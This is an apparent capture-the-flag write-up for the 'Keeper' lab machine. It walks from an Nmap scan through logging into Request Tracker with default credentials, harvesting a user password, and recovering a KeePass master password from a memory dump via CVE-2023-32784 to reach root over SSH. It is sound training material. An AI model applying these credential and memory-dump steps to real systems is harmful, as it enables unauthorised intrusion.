## Nmap

```
Nmap scan report for 10.129.98.120
Host is up, received echo-reply ttl 63 (0.072s latency).
Scanned at 2023-08-14 12:41:11 EDT for 9s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKHZRUyrg9VQfKeHHT6CZwCwu9YkJosNSLvDmPM9EC0iMgHj7URNWV3LjJ00gWvduIq7MfXOxzbfPAqvm2ahzTc=
|   256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBe5w35/5klFq1zo5vISwwbYSVy1Zzy+K9ZCt0px+goO
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Web enum

![](img/Pasted%20image%2020230814124257.png)

##### /etc/hosts
```
10.129.98.120   keeper.htb tickets.keeper.htb
```

## Resquest Tracker Default password

```
root : password
```

`http://tickets.keeper.htb/rt/`

![](img/Pasted%20image%2020230814125309.png)

![](img/Pasted%20image%2020230814125348.png)

## Get user password

`http://tickets.keeper.htb/rt/Admin/Users/`

![](img/Pasted%20image%2020230814125830.png)

`http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27`

![](img/Pasted%20image%2020230814125920.png)

## SSH Connect

`ssh lnorgaard@10.129.98.120`

```
lnorgaard : Welcome2023!
```

![](img/Pasted%20image%2020230814130107.png)

## Priv Esc

`cat /var/mail/lnorgaard`

![](img/Pasted%20image%2020230814131721.png)

`http://tickets.keeper.htb/rt/Ticket/Display.html?id=300000`

![](img/Pasted%20image%2020230814131814.png)

## Copy file

`scp lnorgaard@10.129.98.120:~/RT30000.zip .`

![](img/Pasted%20image%2020230814132217.png)

`unzip RT30000.zip`

![](img/Pasted%20image%2020230814132150.png)

## KeePass Exploit (CVE-2023-32784)

`dotnet run ../KeePassDumpFull.dmp`

![](img/Pasted%20image%2020230814144001.png)

## Danish alphabet

![](img/Pasted%20image%2020230814144140.png)

```
kepassw : rødgrød med fløde
```

## KeePass putty key

![](img/Pasted%20image%2020230814144404.png)

## Convert putty key to ssh

`puttygen key -O private-openssh -o root_rsa`

![](img/Pasted%20image%2020230814145031.png)

## SSH connect

`ssh -i root_rsa root@10.129.98.120`

![](img/Pasted%20image%2020230814145129.png)

## Resources
https://wiki.gentoo.org/wiki/Request_Tracker \
https://learn.microsoft.com/en-us/dotnet/core/install/linux-scripted-manual#scripted-install \
https://github.com/vdohney/keepass-password-dumper \
https://superuser.com/questions/232362/how-to-convert-ppk-key-to-openssh-key-under-linux